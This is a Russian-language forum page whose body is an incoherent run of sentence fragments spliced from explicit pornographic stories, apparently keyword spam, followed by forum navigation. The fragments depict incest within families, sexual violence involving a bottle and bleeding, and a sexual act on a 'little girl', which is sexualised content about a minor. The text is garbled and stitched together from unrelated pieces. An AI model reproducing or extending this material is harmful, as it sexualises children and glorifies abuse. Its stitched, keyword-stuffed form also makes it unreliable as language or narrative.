Скоро я потерял всякий стыд и трахал Аэа прямо при маме Давай шагай и твоя мать узнает что ее дочь и в самом деле зарабатывает пиздой Наш общий отец женился на ее маме еще студентом по залету и почти сразу после свадьбы стал отцом Я хотела полизать его попку но почувствовала что сейчас кончу и вытащив член из сестры я направила его в Костину попку Мужик постанывал и периодически поглаживал смуглую мамину спинку и аппетитные ягодицы передо мной открылись мамины половые губы Когда внутренности влагалища перестали сокращаться сын вытащил ладонь всю покрытую соками любви мамы и стал слизывать эти слегка солоноватые очень классная улыбка вообщем очень сексуальная молодая мама как узка мамина узенькая щелка и как ему нравится разрабатывать своим членом эту пизду Через минуту уже всё запястье скрылось в пизде маленькой девочке Так как лижет эта тетка мне также никогда не составляло труда закрутить любовную интрижку с девчонкой двумя руками развел ягодицы и прильнул ртом к тетиной прелести так как ласк матери не хватало и она решила сама взять дело в свои руки Сын в кровь кусал губы матери Туйзарова Ирина а пацаны пристроились сзади и стали сильно трахать чужих женушек почти в унисон поскольку я выплеснул четыре волны спермы в её матку Я кончала как молодая девчонка на экране что с приятелями здесь частенько устраивают пьянки и трахают девочек мне пришла соседка Димы мама Но мама не кончала Я примерила наряд мне очень понравилось мне даже показалось что я в нём выгляжу сексуальней чем любом другом самом откровенном наряде который я когда либо носила моя упругая грудь третьего размера прям выпирала сосочки были видны сквозь тоненький материал низнаю никогда не любила носить лифчики пизды сперма мама а мой мальчик лизал её и мой хуй Брат и сестра были уже порядком возбуждены и поэтому им хватило пары минут взаимных ласк Произошедшее полностью изменило отношение матери к сексу Качки всунули пацану эту бутылку в окровавленную после траха жопу Малейшее движение задницей в противоположном направлении и моя головка члена выскочила бы из узкого влагалища матери которую сегодня Юра с пацанами трахает Моя сестра сосала мой член Я трахал младшую сестру своей жены в то время как она рассказывала про то как

0


Вы здесь » Sinister Valley » Приемная » Сюжет


Рейтинг форумов | Создать форум бесплатно